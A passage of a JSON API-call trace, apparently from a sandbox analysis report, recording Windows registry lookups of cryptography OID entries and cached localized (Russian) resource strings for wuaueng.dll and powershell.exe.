"api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000548" } ], "repeated": 0, "id": 1588 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbe88e", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000544" } ], "repeated": 0, "id": 1589 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbe781", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000540" }, { "name": "Index", "value": "3" }, { "name": "Name", "value": "1.3.6.1.4.1.311.76.6.1!7" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7" } ], "repeated": 0, "id": 1590 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbe7b1", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000540" }, { "name": "SubKey", "value": "1.3.6.1.4.1.311.76.6.1!7" }, { "name": "Handle", "value": "0x00000544" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7" } ], "repeated": 0, "id": 1591 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbe9c3", "parentcaller": "0x7ffee0bbe7fb", "category": "registry", "api": "RegQueryInfoKeyW", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000544" }, { "name": "Class", "value": "" }, { "name": "SubKeyCount", "value": "0" }, { "name": "MaxSubKeyLength", "value": "0" }, { "name": "MaxClassLength", "value": "0" }, { "name": "ValueCount", "value": "1" }, { "name": "MaxValueNameLength", "value": "4" }, { "name": "MaxValueLength", "value": "80" } ], "repeated": 0, "id": 1592 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbeac9", "parentcaller": "0x7ffee0bbe7fb", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000544" }, { "name": "Index", "value": "0" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "@%SystemRoot%\\System32\\wuaueng.dll,-400" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7\\Name" } ], "repeated": 0, "id": 1593 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbf1d0", "parentcaller": "0x7ffee0bb34e9", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7" }, { "name": "Handle", "value": "0x00000548" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7" } ], "repeated": 0, "id": 1594 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10c2e92", "parentcaller": "0x7ffee10ffb6e", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000548" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "@%SystemRoot%\\System32\\wuaueng.dll,-400" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7\\Name" } ], "repeated": 0, "id": 1595 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baeb5", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" } ], "repeated": 0, "id": 1596 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baf05", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "ValueName", "value": "StringCacheGeneration" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration" } ], "repeated": 0, "id": 1597 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baf2f", "parentcaller": "0x7ffee10ba4cb", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000054c" } ], "repeated": 0, "id": 1598 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee34a6c8b", "parentcaller": "0x7ffee34867b5", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1599 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee34867ec", "parentcaller": "0x7ffee10bfa4e", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 1600 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10bf9e9", "parentcaller": "0x7ffee10cad45", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "DesiredAccess", "value": "0x0002001f", "pretty_value": "KEY_READ|KEY_WRITE" }, { "name": "ObjectAttributesHandle", "value": "0x0000054c" }, { "name": "ObjectAttributesName", "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" } ], "repeated": 0, "id": 1601 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10bfa05", "parentcaller": "0x7ffee10cad45", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000054c" } ], "repeated": 0, "id": 1602 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10c07f5", "parentcaller": "0x7ffee10ba864", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\wuaueng.dll" } ], "repeated": 0, "id": 1603 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10be270", "parentcaller": "0x7ffee10bb8b0", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "ValueName", "value": "@%SystemRoot%\\System32\\wuaueng.dll,-400" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "\\x426\\x435\\x43d\\x442\\x440 \\x43e\\x431\\x43d\\x43e\\x432\\x43b\\x435\\x43d\\x438\\x44f Windows" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\wuaueng.dll,-400" } ], "repeated": 0, "id": 1604 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10ba8d5", "parentcaller": "0x7ffee10ffc2b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000550" } ], "repeated": 0, "id": 1605 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10c2e92", "parentcaller": "0x7ffee10ffb6e", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000548" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "@%SystemRoot%\\System32\\wuaueng.dll,-400" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7\\Name" } ], "repeated": 0, "id": 1606 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baeb5", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" } ], "repeated": 0, "id": 1607 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baf05", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "ValueName", "value": "StringCacheGeneration" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration" } ], "repeated": 0, "id": 1608 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baf2f", "parentcaller": "0x7ffee10ba4cb", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000550" } ], "repeated": 0, "id": 1609 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee34a6c8b", "parentcaller": "0x7ffee34867b5", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1610 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee34867ec", "parentcaller": "0x7ffee10bfa4e", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 1611 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10bf9e9", "parentcaller": "0x7ffee10cad45", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "DesiredAccess", "value": "0x0002001f", "pretty_value": "KEY_READ|KEY_WRITE" }, { "name": "ObjectAttributesHandle", "value": "0x00000550" }, { "name": "ObjectAttributesName", "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" } ], "repeated": 0, "id": 1612 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10bfa05", "parentcaller": "0x7ffee10cad45", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000550" } ], "repeated": 0, "id": 1613 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10c07f5", "parentcaller": "0x7ffee10ba864", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\wuaueng.dll" } ], "repeated": 0, "id": 1614 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10be270", "parentcaller": "0x7ffee10bb8b0", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "ValueName", "value": "@%SystemRoot%\\System32\\wuaueng.dll,-400" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "\\x426\\x435\\x43d\\x442\\x440 \\x43e\\x431\\x43d\\x43e\\x432\\x43b\\x435\\x43d\\x438\\x44f Windows" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\wuaueng.dll,-400" } ], "repeated": 0, "id": 1615 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10ba8d5", "parentcaller": "0x7ffee10ffc2b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000054c" } ], "repeated": 0, "id": 1616 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbf464", "parentcaller": "0x7ffee0bbf2b2", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000548" } ], "repeated": 0, "id": 1617 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe88e", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000544" } ], "repeated": 0, "id": 1618 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe781", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000540" }, { "name": "Index", "value": "4" }, { "name": "Name", "value": "1.3.6.1.4.1.311.80.1!7" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7" } ], "repeated": 0, "id": 1619 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe7b1", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000540" }, { "name": "SubKey", "value": "1.3.6.1.4.1.311.80.1!7" }, { "name": "Handle", "value": "0x00000544" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7" } ], "repeated": 0, "id": 1620 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe9c3", "parentcaller": "0x7ffee0bbe7fb", "category": "registry", "api": "RegQueryInfoKeyW", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000544" }, { "name": "Class", "value": "" }, { "name": "SubKeyCount", "value": "0" }, { "name": "MaxSubKeyLength", "value": "0" }, { "name": "MaxClassLength", "value": "0" }, { "name": "ValueCount", "value": "1" }, { "name": "MaxValueNameLength", "value": "4" }, { "name": "MaxValueLength", "value": "132" } ], "repeated": 0, "id": 1621 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbeac9", "parentcaller": "0x7ffee0bbe7fb", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000544" }, { "name": "Index", "value": "0" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7\\Name" } ], "repeated": 0, "id": 1622 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbf1d0", "parentcaller": "0x7ffee0bb34e9", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7" }, { "name": "Handle", "value": "0x00000548" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7" } ], "repeated": 0, "id": 1623 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10c2e92", "parentcaller": "0x7ffee10ffb6e", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000548" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7\\Name" } ], "repeated": 0, "id": 1624 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10baeb5", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" } ], "repeated": 0, "id": 1625 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10baf05", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "ValueName", "value": "StringCacheGeneration" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration" } ], "repeated": 0, "id": 1626 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10baf2f", "parentcaller": "0x7ffee10ba4cb", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000054c" } ], "repeated": 0, "id": 1627 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee34a6c8b", "parentcaller": "0x7ffee34867b5", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1628 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee34867ec", "parentcaller": "0x7ffee10bfa4e", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 1629 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10bf9e9", "parentcaller": "0x7ffee10cad45", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "DesiredAccess", "value": "0x0002001f", "pretty_value": "KEY_READ|KEY_WRITE" }, { "name": "ObjectAttributesHandle", "value": "0x0000054c" }, { "name": "ObjectAttributesName", "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" } ], "repeated": 0, "id": 1630 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10bfa05", "parentcaller": "0x7ffee10cad45", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000054c" } ], "repeated": 0, "id": 1631 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10c07f5", "parentcaller": "0x7ffee10ba864", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" } ], "repeated": 0, "id": 1632 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10be270", "parentcaller": "0x7ffee10bb8b0", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "ValueName", "value": "@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "\\x428\\x438\\x444\\x440\\x43e\\x432\\x430\\x43d\\x438\\x435 \\x434\\x43e\\x43a\\x443\\x43c\\x435\\x43d\\x442\\x43e\\x432" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124" } ], "repeated": 0, "id": 1633 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10ba8d5", "parentcaller": "0x7ffee10ffc2b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000550" } ], "repeated": 0, "id": 1634 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10c2e92", "parentcaller": "0x7ffee10ffb6e", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000548" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7\\Name" } ], "repeated": 0, "id": 1635 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10baeb5", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" } ], "repeated": 0, "id": 1636 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10baf05", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "ValueName", "value": "StringCacheGeneration" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration" } ], "repeated": 0, "id": 1637 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10baf2f", "parentcaller": "0x7ffee10ba4cb", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000550" } ], "repeated": 0, "id": 1638 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee34a6c8b", "parentcaller": "0x7ffee34867b5", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": 